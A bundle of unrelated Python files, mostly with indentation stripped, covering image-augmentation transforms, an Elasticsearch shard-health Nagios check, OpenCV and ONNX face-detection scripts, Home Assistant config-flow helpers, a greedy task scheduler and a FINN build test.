h, w (int): original image size
new_h, new_w (int): new image size
interp: PIL interpolation methods, defaults to bilinear.
"""
# TODO decide on PIL vs opencv
super().__init__()
if interp is None:
interp = Image.BILINEAR
self._set_attributes(locals())
def apply_image(self, img, interp=None):
assert img.shape[:2] == (self.h, self.w)
assert len(img.shape) <= 4
if img.dtype == np.uint8:
pil_image = Image.fromarray(img)
interp_method = interp if interp is not None else self.interp
pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)
ret = np.asarray(pil_image)
else:
# PIL only supports uint8
if any(x < 0 for x in img.strides):
img = np.ascontiguousarray(img)
img = torch.from_numpy(img)
shape = list(img.shape)
shape_4d = shape[:2] + [1] * (4 - len(shape)) + shape[2:]
img = img.view(shape_4d).permute(2, 3, 0, 1) # hw(c) -> nchw
_PIL_RESIZE_TO_INTERPOLATE_MODE = {Image.BILINEAR: "bilinear", Image.BICUBIC: "bicubic"}
mode = _PIL_RESIZE_TO_INTERPOLATE_MODE[self.interp]
img = F.interpolate(img, (self.new_h, self.new_w), mode=mode, align_corners=False)
shape[:2] = (self.new_h, self.new_w)
ret = img.permute(2, 3, 0, 1).view(shape).numpy() # nchw -> hw(c)
return ret
def apply_coords(self, coords):
coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)
coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)
return coords
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=Image.NEAREST)
return segmentation
def inverse(self):
return ResizeTransform(self.new_h, self.new_w, self.h, self.w, self.interp)
class RotationTransform(WrapTransform):
"""
This method returns a copy of this image, rotated the given
number of degrees counter clockwise around its center.
"""
def __init__(self, h, w, angle, expand=True, center=None, interp=None):
"""
Args:
h, w (int): original image size
angle (float): degrees for rotation
expand (bool): choose if the image should be resized to fit the whole
rotated image (default), or simply cropped
center (tuple (width, height)): coordinates of the rotation center
if left to None, the center will be fit to the center of each image
center has no effect if expand=True because it only affects shifting
interp: cv2 interpolation method, default cv2.INTER_LINEAR
"""
super().__init__()
image_center = np.array((w / 2, h / 2))
if center is None:
center = image_center
if interp is None:
interp = cv2.INTER_LINEAR
abs_cos, abs_sin = (abs(np.cos(np.deg2rad(angle))), abs(np.sin(np.deg2rad(angle))))
if expand:
# find the new width and height bounds
bound_w, bound_h = np.rint(
[h * abs_sin + w * abs_cos, h * abs_cos + w * abs_sin]
).astype(int)
else:
bound_w, bound_h = w, h
self._set_attributes(locals())
self.rm_coords = self.create_rotation_matrix()
# Needed because of this problem https://github.com/opencv/opencv/issues/11784
self.rm_image = self.create_rotation_matrix(offset=-0.5)
def apply_image(self, img, interp=None):
"""
img should be a numpy array, formatted as Height * Width * Nchannels
"""
if len(img) == 0 or self.angle % 360 == 0:
return img
assert img.shape[:2] == (self.h, self.w)
interp = interp if interp is not None else self.interp
return cv2.warpAffine(img, self.rm_image, (self.bound_w, self.bound_h), flags=interp)
def apply_coords(self, coords):
"""
coords should be a N * 2 array-like, containing N couples of (x, y) points
"""
coords = np.asarray(coords, dtype=float)
if len(coords) == 0 or self.angle % 360 == 0:
return coords
return cv2.transform(coords[:, np.newaxis, :], self.rm_coords)[:, 0, :]
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation, interp=cv2.INTER_NEAREST)
return segmentation
def create_rotation_matrix(self, offset=0):
center = (self.center[0] + offset, self.center[1] + offset)
rm = cv2.getRotationMatrix2D(tuple(center), self.angle, 1)
if self.expand:
# Find the coordinates of the center of rotation in the new image
# The only point for which we know the future coordinates is the center of the image
rot_im_center = cv2.transform(self.image_center[None, None, :] + offset, rm)[0, 0, :]
new_center = np.array([self.bound_w / 2, self.bound_h / 2]) + offset - rot_im_center
# shift the rotation center to the new coordinates
rm[:, 2] += new_center
return rm
def inverse(self):
"""
The inverse is to rotate it back with expand, and crop to get the original shape.
"""
if not self.expand: # Not possible to inverse if a part of the image is lost
raise NotImplementedError()
rotation = RotationTransform(
self.bound_h, self.bound_w, -self.angle, True, None, self.interp
)
crop = CropTransform(
(rotation.bound_w - self.w) // 2, (rotation.bound_h - self.h) // 2, self.w, self.h
)
return TransformList([rotation, crop])
class ColorTransform(WrapTransform):
"""
Generic wrapper for any photometric transforms.
These transformations should only affect the color space and
not the coordinate space of the image (e.g. annotation
coordinates such as bounding boxes should not be changed)
"""
def __init__(self, op):
"""
Args:
op (Callable): operation to be applied to the image,
which takes in an ndarray and returns an ndarray.
"""
if not callable(op):
raise ValueError("op parameter should be callable")
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
return self.op(img)
def apply_coords(self, coords):
return coords
def inverse(self):
return NoOpTransform()
def apply_segmentation(self, segmentation):
return segmentation
class PILColorTransform(ColorTransform):
"""
Generic wrapper for PIL Photometric image transforms,
which affect the color space and not the coordinate
space of the image
"""
def __init__(self, op):
"""
Args:
op (Callable): operation to be applied to the image,
which takes in a PIL Image and returns a transformed
PIL Image.
For reference on possible operations see:
- https://pillow.readthedocs.io/en/stable/
"""
if not callable(op):
raise ValueError("op parameter should be callable")
super().__init__(op)
def apply_image(self, img):
img = Image.fromarray(img)
return np.asarray(super().apply_image(img))
class EdgeFilterTransform(WrapTransform):
"""tfy
Filter an image by using Gaussian Filter
"""
def __init__(self, radius):
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
ret = ret.filter(ImageFilter.GaussianBlur(self.radius))
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class BoxShearTransform(WrapTransform):
"""tfy
Shear some boxes along x or y axis
"""
def __init__(self, along_x_info, along_y_info, annotations):
"""Args:
            along_x_info(list[dict]): along the x axis, the shear info for each gt box
            along_y_info(list[dict]): along the y axis, the shear info for each gt box
annotations(list[dict]): annotations info
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
for x_info in self.along_x_info:
M = x_info["M"]
new_w = x_info["new_w"]
color = x_info["color"]
anno_idx = x_info["anno_idx"]
bbox = list(map(int, self.annotations[anno_idx]["bbox"]))
box_w = bbox[2] - bbox[0]
box_h = bbox[3] - bbox[1]
#get box img to shear
cropped_img = ret.crop(bbox)
#do shear
cropped_img = cropped_img.transform((int(new_w), int(box_h)), Image.AFFINE, M, resample=Image.BILINEAR, fillcolor=color)
transformed_w, transformed_h = cropped_img.size
            if transformed_w <= 0 or transformed_h <= 0:
return np.asarray(ret)
#shear changes size, resize it back
cropped_img = cropped_img.resize((int(box_w), int(box_h)), Image.BILINEAR)
#paste back
ret.paste(cropped_img, bbox)
for y_info in self.along_y_info:
M = y_info["M"]
new_h = y_info["new_h"]
color = y_info["color"]
anno_idx = y_info["anno_idx"]
bbox = list(map(int, self.annotations[anno_idx]["bbox"]))
box_w = bbox[2] - bbox[0]
box_h = bbox[3] - bbox[1]
#get box img to shear
cropped_img = ret.crop(bbox)
#do shear
cropped_img = cropped_img.transform((int(box_w), int(new_h)), Image.AFFINE, M, resample=Image.BILINEAR, fillcolor=color)
transformed_w, transformed_h = cropped_img.size
            if transformed_w <= 0 or transformed_h <= 0:
return np.asarray(ret)
#shear changes size, resize it back
cropped_img = cropped_img.resize((int(box_w), int(box_h)), Image.BILINEAR)
#paste back
ret.paste(cropped_img, bbox)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class BoxContrastTransform(WrapTransform):
def __init__(self, invert_region):
"""Args
invert_region(list): regions that computed to do invert
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
for region in self.invert_region:
cropped_img = ret.crop(region)
cropped_img = ImageOps.invert(cropped_img)
ret.paste(cropped_img, region)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class NoiseTransform(WrapTransform):
def __init__(self, rate):
"""Args
rate(float): the rate pixles to be changed into noise
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
img_w, img_h = ret.size
noise_num = int(self.rate * img_w * img_h)
#add a random noise on a random position
for _ in range(noise_num):
x = random.randint(1, img_w-1)
y = random.randint(1, img_h-1)
noise = random.randint(0, 255)
ret.putpixel((x,y), noise)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class BoxEraseTransform(WrapTransform):
def __init__(self, fill_region):
"""Args:
fill_region: regions to erase
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
#fill the region
for region in self.fill_region:
ret = fill_region(ret, region)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class MosaicTransform(WrapTransform):
def __init__(self, mosaic_direction):
"""Args:
mosaic_direction: directions to tile img, "right" or "bottom"
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
        has_mosaic_right = False
        has_mosaic_bottom = False
        ret = Image.fromarray(img)
        # Remember the pre-mosaic image size so apply_annotations() can shift the
        # duplicated boxes (apply_image is expected to be called first).
        self.orig_w, self.orig_h = ret.size
for direction in self.mosaic_direction:
mosaic_img = ret.copy()
img_w, img_h = ret.size
#right
if direction=="right" and (not has_mosaic_right):
ret = ImageOps.expand(ret, border=(0, 0, img_w, 0))
ret.paste(mosaic_img, (img_w, 0))
has_mosaic_right = True
#bottom
elif not has_mosaic_bottom:
ret = ImageOps.expand(ret, border=(0, 0, 0, img_h))
ret.paste(mosaic_img, (0, img_h))
has_mosaic_bottom = True
return np.asarray(ret)
def apply_coords(self, coords):
return coords
    def apply_annotations(self, annotations):
        """
        Each tiled copy of the image gets a shifted copy of every annotation.
        Assumes apply_image() has already been called so that the pre-mosaic image
        size is available as self.orig_w / self.orig_h.
        """
        has_mosaic_right = False
        has_mosaic_bottom = False
        img_w, img_h = self.orig_w, self.orig_h
        for direction in self.mosaic_direction:
            #right
            if direction=="right" and (not has_mosaic_right):
                dx, dy = img_w, 0
                has_mosaic_right = True
            #bottom
            elif not has_mosaic_bottom:
                dx, dy = 0, img_h
                has_mosaic_bottom = True
            else:
                continue
            shifted_annos = []
            for anno in annotations:
                shifted = dict(anno)
                x0, y0, x1, y1 = anno["bbox"]
                shifted["bbox"] = [x0 + dx, y0 + dy, x1 + dx, y1 + dy]
                shifted_annos.append(shifted)
            annotations = annotations + shifted_annos
        return annotations
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation)
return segmentation
def inverse(self):
return NoOpTransform()
class BoxMoveTransform(WrapTransform):
def __init__(self, move_info):
"""Args:
move_info: how to move box (rescale and paste point)
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
for info in self.move_info:
anno_id = info["anno_id"]
anno_move_info = info["anno_move_info"]
for single_move_info in anno_move_info:
dst_size = single_move_info["dst_size"]
to_paste_point = single_move_info["to_paste_point"]
raw_box_coor = single_move_info["raw_box_coor"]
cropped_img = ret.crop(raw_box_coor)
cropped_img = cropped_img.resize(dst_size, Image.BILINEAR)
to_paste_point = list(map(int, to_paste_point))
ret.paste(cropped_img, to_paste_point)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
        # TODO: not implemented yet
return segmentation
def apply_annotations(self, annotations):
for info in self.move_info:
anno_id = info["anno_id"]
anno_move_info = info["anno_move_info"]
for single_move_info in anno_move_info:
anno = {}
dst_size = single_move_info["dst_size"]
to_paste_point = single_move_info["to_paste_point"]
new_box_left = to_paste_point[0]
new_box_top = to_paste_point[1]
new_box_right = to_paste_point[0] + dst_size[0]
new_box_bottom = to_paste_point[1] + dst_size[1]
anno['bbox'] = [float(new_box_left), float(new_box_top), float(new_box_right), float(new_box_bottom)]
anno['bbox_mode'] = annotations[anno_id]["bbox_mode"]
anno['category_id'] = int(annotations[anno_id]["category_id"])
annotations.append(anno)
return annotations
def inverse(self):
return NoOpTransform()
def HFlip_rotated_box(transform, rotated_boxes):
"""
Apply the horizontal flip transform on rotated boxes.
Args:
rotated_boxes (ndarray): Nx5 floating point array of
(x_center, y_center, width, height, angle_degrees) format
in absolute coordinates.
"""
# Transform x_center
rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]
# Transform angle
rotated_boxes[:, 4] = -rotated_boxes[:, 4]
return rotated_boxes
def Resize_rotated_box(transform, rotated_boxes):
"""
Apply the resizing transform on rotated boxes. For details of how these (approximation)
formulas are derived, please refer to :meth:`RotatedBoxes.scale`.
Args:
rotated_boxes (ndarray): Nx5 floating point array of
(x_center, y_center, width, height, angle_degrees) format
in absolute coordinates.
"""
scale_factor_x = transform.new_w * 1.0 / transform.w
scale_factor_y = transform.new_h * 1.0 / transform.h
rotated_boxes[:, 0] *= scale_factor_x
rotated_boxes[:, 1] *= scale_factor_y
theta = rotated_boxes[:, 4] * np.pi / 180.0
c = np.cos(theta)
s = np.sin(theta)
rotated_boxes[:, 2] *= np.sqrt(np.square(scale_factor_x * c) + np.square(scale_factor_y * s))
rotated_boxes[:, 3] *= np.sqrt(np.square(scale_factor_x * s) + np.square(scale_factor_y * c))
rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s, scale_factor_y * c) * 180 / np.pi
return rotated_boxes
HFlipTransform.register_type("rotated_box", HFlip_rotated_box)
ResizeTransform.register_type("rotated_box", Resize_rotated_box)
# not necessary any more with latest fvcore
NoOpTransform.register_type("rotated_box", lambda t, x: x)
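# A minimal usage sketch for the registrations above (box values illustrative):
# after register_type(), fvcore generates an ``apply_rotated_box`` method on each
# registered transform class.
#
#     flip = HFlipTransform(width=640)
#     rboxes = np.array([[100.0, 200.0, 60.0, 30.0, 15.0]])  # (cx, cy, w, h, angle)
#     flipped_rboxes = flip.apply_rotated_box(rboxes)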
|
from typing import List
def rose_smell_increase(roses: List[int]) -> int:
n, max_sub = len(roses), 0
forward, backward = [1 for _ in range(n)], [1 for _ in range(n)]
for i in range(1, n):
if roses[i] > roses[i - 1]:
forward[i] = forward[i - 1] + 1
else:
max_sub = max(max_sub, forward[i - 1])
max_sub = max(max_sub, forward[-1])
for i in range(n - 2, -1, -1):
if roses[i] < roses[i + 1]:
backward[i] = backward[i + 1] + 1
# Calculate the maximum length of the
# strictly increasing subarray without
# removing any element
# max_sub, length_sub = 0, 1
# for i in range(1, n):
# if roses[i] > roses[i - 1]:
# length_sub += 1
# else:
# length_sub = 1
# max_sub = max(max_sub, length_sub)
# Calculate the maximum length of the
# strictly increasing subarray after
# removing the current element
for i in range(1, n - 1):
if roses[i - 1] < roses[i + 1]:
max_sub = max(max_sub, forward[i - 1] + backward[i + 1])
return max_sub
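# A small self-check, not part of the original module: the function returns the
# length of the longest strictly increasing run obtainable after removing at most
# one element.
if __name__ == "__main__":
    assert rose_smell_increase([1, 2, 5, 3, 4]) == 4  # drop the 5 -> 1, 2, 3, 4
    assert rose_smell_increase([5, 4, 3, 2, 1]) == 1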
|
#!/usr/bin/python
from nagioscheck import NagiosCheck, UsageError
from nagioscheck import PerformanceMetric, Status
import urllib2
import optparse
try:
import json
except ImportError:
import simplejson as json
class ESShardsCheck(NagiosCheck):
def __init__(self):
NagiosCheck.__init__(self)
self.add_option('H', 'host', 'host', 'The cluster to check')
self.add_option('P', 'port', 'port', 'The ES port - defaults to 9200')
def check(self, opts, args):
host = opts.host
port = int(opts.port or '9200')
try:
response = urllib2.urlopen(r'http://%s:%d/_cluster/health'
% (host, port))
except urllib2.HTTPError, e:
raise Status('unknown', ("API failure", None,
"API failure:\n\n%s" % str(e)))
except urllib2.URLError, e:
raise Status('critical', (e.reason))
response_body = response.read()
try:
es_cluster_health = json.loads(response_body)
except ValueError:
raise Status('unknown', ("API returned nonsense",))
unassigned_shards = es_cluster_health['unassigned_shards']
        if unassigned_shards > 0:
raise Status('CRITICAL',
"There are '%s' unassigned shards in the cluster"
% (unassigned_shards))
else:
raise Status('OK',
"All shards in the cluster are currently assigned")
if __name__ == "__main__":
ESShardsCheck().run()
|
# @Author: Varoon Pazhyanur <varoon>
# @Date: 28-08-2017
# @Filename: image_combine.py
# @Last modified by: varoon
# @Last modified time: 28-08-2017
import cv2
import numpy as np
#GOAL: put the opencv logo on an image and make it opaque(rather than transparent)
messi = cv2.imread("messi5.jpg")
cv_logo = cv2.imread("opencv-logo.png")
rows,cols,channels = cv_logo.shape
roi = messi[0:rows, 0:cols] #going to put logo in top left
#using a mask because the CV logo is not a rectangle. Find pixels of interest with threshold.
cv_logo_grey = cv2.cvtColor(cv_logo, cv2.COLOR_BGR2GRAY)
ret,mask = cv2.threshold(cv_logo_grey,10,255,cv2.THRESH_BINARY) #THRESHOLD IMAGE
mask_inv = cv2.bitwise_not(mask)
messi_bg=cv2.bitwise_and(roi,roi,mask = mask_inv)
cv_logo_fg = cv2.bitwise_and(cv_logo,cv_logo,mask=mask)
cv2.imshow("test",mask)
res = cv2.add(messi_bg, cv_logo_fg)
messi[0:rows, 0:cols] = res
cv2.imshow("Messi and CV Logo", messi)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
"""Helpers for data entry flows for helper config entries."""
from __future__ import annotations
from abc import abstractmethod
from collections.abc import Callable, Mapping
import copy
from dataclasses import dataclass
from typing import Any
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.core import HomeAssistant, callback, split_entity_id
from homeassistant.data_entry_flow import FlowResult, UnknownHandler
from . import entity_registry as er
class HelperFlowError(Exception):
"""Validation failed."""
@dataclass
class HelperFlowStep:
"""Define a helper config or options flow step."""
# Optional schema for requesting and validating user input. If schema validation
# fails, the step will be retried. If the schema is None, no user input is requested.
schema: vol.Schema | None
# Optional function to validate user input.
# The validate_user_input function is called if the schema validates successfully.
# The validate_user_input function is passed the user input from the current step.
    # The validate_user_input function should raise HelperFlowError if user input is invalid.
validate_user_input: Callable[[dict[str, Any]], dict[str, Any]] = lambda x: x
# Optional function to identify next step.
# The next_step function is called if the schema validates successfully or if no
# schema is defined. The next_step function is passed the union of config entry
# options and user input from previous steps.
# If next_step returns None, the flow is ended with RESULT_TYPE_CREATE_ENTRY.
next_step: Callable[[dict[str, Any]], str | None] = lambda _: None
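# A minimal sketch of a flow built from HelperFlowStep (the "user" step id, the
# "name" option key and the validation function are illustrative assumptions, not
# part of this module):
#
#     def _validate(user_input: dict[str, Any]) -> dict[str, Any]:
#         if not user_input.get("name"):
#             raise HelperFlowError("name_required")
#         return user_input
#
#     CONFIG_FLOW: dict[str, HelperFlowStep] = {
#         "user": HelperFlowStep(
#             schema=vol.Schema({vol.Required("name"): str}),
#             validate_user_input=_validate,
#             next_step=lambda _options: None,  # None ends the flow
#         )
#     }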
class HelperCommonFlowHandler:
"""Handle a config or options flow for helper."""
def __init__(
self,
handler: HelperConfigFlowHandler | HelperOptionsFlowHandler,
flow: dict[str, HelperFlowStep],
config_entry: config_entries.ConfigEntry | None,
) -> None:
"""Initialize a common handler."""
self._flow = flow
self._handler = handler
self._options = dict(config_entry.options) if config_entry is not None else {}
async def async_step(
self, step_id: str, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a step."""
next_step_id: str = step_id
if user_input is not None and self._flow[next_step_id].schema is not None:
# Do extra validation of user input
try:
user_input = self._flow[next_step_id].validate_user_input(user_input)
except HelperFlowError as exc:
return self._show_next_step(next_step_id, exc, user_input)
if user_input is not None:
# User input was validated successfully, update options
self._options.update(user_input)
if self._flow[next_step_id].next_step and (
user_input is not None or self._flow[next_step_id].schema is None
):
# Get next step
next_step_id_or_end_flow = self._flow[next_step_id].next_step(self._options)
if next_step_id_or_end_flow is None:
# Flow done, create entry or update config entry options
return self._handler.async_create_entry(data=self._options)
next_step_id = next_step_id_or_end_flow
return self._show_next_step(next_step_id)
def _show_next_step(
self,
next_step_id: str,
error: HelperFlowError | None = None,
user_input: dict[str, Any] | None = None,
) -> FlowResult:
"""Show step for next step."""
options = dict(self._options)
if user_input:
options.update(user_input)
if (data_schema := self._flow[next_step_id].schema) and data_schema.schema:
# Make a copy of the schema with suggested values set to saved options
schema = {}
for key, val in data_schema.schema.items():
new_key = key
if key in options and isinstance(key, vol.Marker):
# Copy the marker to not modify the flow schema
new_key = copy.copy(key)
new_key.description = {"suggested_value": options[key]}
schema[new_key] = val
data_schema = vol.Schema(schema)
errors = {"base": str(error)} if error else None
# Show form for next step
return self._handler.async_show_form(
step_id=next_step_id, data_schema=data_schema, errors=errors
)
class HelperConfigFlowHandler(config_entries.ConfigFlow):
"""Handle a config flow for helper integrations."""
config_flow: dict[str, HelperFlowStep]
options_flow: dict[str, HelperFlowStep] | None = None
VERSION = 1
# pylint: disable-next=arguments-differ
def __init_subclass__(cls, **kwargs: Any) -> None:
"""Initialize a subclass."""
super().__init_subclass__(**kwargs)
@callback
def _async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> config_entries.OptionsFlow:
"""Get the options flow for this handler."""
if cls.options_flow is None:
raise UnknownHandler
return HelperOptionsFlowHandler(
config_entry, cls.options_flow, cls.async_options_flow_finished
)
# Create an async_get_options_flow method
cls.async_get_options_flow = _async_get_options_flow # type: ignore[assignment]
# Create flow step methods for each step defined in the flow schema
for step in cls.config_flow:
setattr(cls, f"async_step_{step}", cls._async_step)
def __init__(self) -> None:
"""Initialize config flow."""
self._common_handler = HelperCommonFlowHandler(self, self.config_flow, None)
@classmethod
@callback
def async_supports_options_flow(
cls, config_entry: config_entries.ConfigEntry
) -> bool:
"""Return options flow support for this handler."""
return cls.options_flow is not None
async def _async_step(self, user_input: dict[str, Any] | None = None) -> FlowResult:
"""Handle a config flow step."""
step_id = self.cur_step["step_id"] if self.cur_step else "user"
result = await self._common_handler.async_step(step_id, user_input)
return result
# pylint: disable-next=no-self-use
@abstractmethod
@callback
def async_config_entry_title(self, options: Mapping[str, Any]) -> str:
"""Return config entry title.
The options parameter contains config entry options, which is the union of user
input from the config flow steps.
"""
@callback
def async_config_flow_finished(self, options: Mapping[str, Any]) -> None:
"""Take necessary actions after the config flow is finished, if needed.
The options parameter contains config entry options, which is the union of user
input from the config flow steps.
"""
@callback
@staticmethod
def async_options_flow_finished(
hass: HomeAssistant, options: Mapping[str, Any]
) -> None:
"""Take necessary actions after the options flow is finished, if needed.
The options parameter contains config entry options, which is the union of stored
options and user input from the options flow steps.
"""
@callback
def async_create_entry( # pylint: disable=arguments-differ
self,
data: Mapping[str, Any],
**kwargs: Any,
) -> FlowResult:
"""Finish config flow and create a config entry."""
self.async_config_flow_finished(data)
return super().async_create_entry(
data={}, options=data, title=self.async_config_entry_title(data), **kwargs
)
class HelperOptionsFlowHandler(config_entries.OptionsFlow):
"""Handle an options flow for helper integrations."""
def __init__(
self,
config_entry: config_entries.ConfigEntry,
options_flow: dict[str, vol.Schema],
async_options_flow_finished: Callable[[HomeAssistant, Mapping[str, Any]], None],
) -> None:
"""Initialize options flow."""
self._common_handler = HelperCommonFlowHandler(self, options_flow, config_entry)
self._config_entry = config_entry
self._async_options_flow_finished = async_options_flow_finished
for step in options_flow:
setattr(self, f"async_step_{step}", self._async_step)
async def _async_step(self, user_input: dict[str, Any] | None = None) -> FlowResult:
"""Handle an options flow step."""
# pylint: disable-next=unsubscriptable-object # self.cur_step is a dict
step_id = self.cur_step["step_id"] if self.cur_step else "init"
return await self._common_handler.async_step(step_id, user_input)
@callback
def async_create_entry( # pylint: disable=arguments-differ
self,
data: Mapping[str, Any],
**kwargs: Any,
) -> FlowResult:
"""Finish config flow and create a config entry."""
self._async_options_flow_finished(self.hass, data)
return super().async_create_entry(title="", data=data, **kwargs)
@callback
def wrapped_entity_config_entry_title(
hass: HomeAssistant, entity_id_or_uuid: str
) -> str:
"""Generate title for a config entry wrapping a single entity.
If the entity is registered, use the registry entry's name.
If the entity is in the state machine, use the name from the state.
Otherwise, fall back to the object ID.
"""
registry = er.async_get(hass)
entity_id = er.async_validate_entity_id(registry, entity_id_or_uuid)
object_id = split_entity_id(entity_id)[1]
entry = registry.async_get(entity_id)
if entry:
return entry.name or entry.original_name or object_id
state = hass.states.get(entity_id)
if state:
return state.name or object_id
return object_id
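# A minimal sketch of the fallback order implemented above (entity id and names are
# illustrative): a registry name wins, then the state name, then the object id.
#
#     title = wrapped_entity_config_entry_title(hass, "light.kitchen")
#     # -> "Kitchen Light" if the registry or state supplies a name, else "kitchen"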
|
"""
This code uses the onnx model to detect faces from live video or cameras.
"""
import sys
#import time
import argparse
import cv2
import numpy as np
import onnx
from caffe2.python.onnx import backend
import onnxruntime as ort
import vision.utils.box_utils_numpy as box_utils
def predict(width,
height,
confidences,
boxes,
prob_threshold,
iou_threshold=0.3,
top_k=-1):
boxes = boxes[0]
confidences = confidences[0]
picked_box_probs = []
picked_labels = []
for class_index in range(1, confidences.shape[1]):
probs = confidences[:, class_index]
mask = probs > prob_threshold
probs = probs[mask]
if probs.shape[0] == 0:
continue
subset_boxes = boxes[mask, :]
box_probs = np.concatenate(
[subset_boxes, probs.reshape(-1, 1)], axis=1)
box_probs = box_utils.hard_nms(
box_probs, iou_threshold=iou_threshold, top_k=top_k)
picked_box_probs.append(box_probs)
picked_labels.extend([class_index] * box_probs.shape[0])
if not picked_box_probs:
return np.array([]), np.array([]), np.array([])
picked_box_probs = np.concatenate(picked_box_probs)
picked_box_probs[:, 0] *= width
picked_box_probs[:, 1] *= height
picked_box_probs[:, 2] *= width
picked_box_probs[:, 3] *= height
return picked_box_probs[:, :4].astype(
np.int32), np.array(picked_labels), picked_box_probs[:, 4]
def parse_args():
parser = argparse.ArgumentParser(description="face detection")
parser.add_argument(
"--input", type=str, default="", help="input file path")
parser.add_argument(
"--model",
type=str,
default="models/onnx/version-RFB-320.onnx",
help="model file path")
return parser.parse_args()
def main():
args = parse_args()
onnx_path = args.model
predictor = onnx.load(onnx_path)
onnx.checker.check_model(predictor)
onnx.helper.printable_graph(predictor.graph)
predictor = backend.prepare(predictor, device="CPU") # default CPU
ort_session = ort.InferenceSession(onnx_path)
input_name = ort_session.get_inputs()[0].name
cap = cv2.VideoCapture(args.input)
threshold = 0.7
frame = 0
while True:
# TODO: pipeline reading/conversion and inference
_, orig_image = cap.read()
if orig_image is None:
print("no img", file=sys.stderr)
break
image = cv2.cvtColor(orig_image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (320, 240))
# image = cv2.resize(image, (640, 480))
image_mean = np.array([127, 127, 127])
image = (image - image_mean) / 128
image = np.transpose(image, [2, 0, 1])
image = np.expand_dims(image, axis=0)
image = image.astype(np.float32)
#time_time = time.time()
confidences, boxes = ort_session.run(None, {input_name: image})
# print("cost time: {}".format(time.time() - time_time))
boxes, _, _ = predict(orig_image.shape[1], orig_image.shape[0],
confidences, boxes, threshold)
print("frame %06d box count: %d" % (frame, len(boxes)))
frame = frame + 1
if __name__ == '__main__':
main()
|
from scheduler.problem import Instance, InstanceSolution
from collections import deque
def solve(instance: Instance) -> InstanceSolution:
"""Solves the P||Cmax problem by using a greedy algorithm.
:param instance: valid problem instance
:return: generated solution of a given problem instance
"""
processors = [[0, deque([])] for _ in range(instance.processors_number)]
for task_index, task_duration in enumerate(instance.tasks_durations):
free_processor = min(enumerate(processors), key=lambda x: x[1][0])[0]
processors[free_processor][0] += task_duration
processors[free_processor][1].append(task_index)
result_processors = list(map(lambda x: list(x[1]), processors))
return InstanceSolution(instance, result_processors)
__all__ = ["solve"]
|
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest
import pkg_resources as pk
from shutil import copytree
from finn.util.basic import make_build_dir
from finn.builder.build_dataflow import build_dataflow_directory
import os
@pytest.mark.slow
@pytest.mark.vivado
def test_build_dataflow_directory():
test_dir = make_build_dir("test_build_dataflow_directory_")
target_dir = test_dir + "/build_dataflow"
example_data_dir = pk.resource_filename("finn.qnn-data", "build_dataflow/")
copytree(example_data_dir, target_dir)
build_dataflow_directory(target_dir)
# check the generated files
output_dir = target_dir + "/output_tfc_w1a1_Pynq-Z1"
assert os.path.isfile(output_dir + "/time_per_step.json")
assert os.path.isfile(output_dir + "/final_hw_config.json")
assert os.path.isfile(output_dir + "/stitched_ip/ip/component.xml")
assert os.path.isfile(output_dir + "/driver/driver.py")
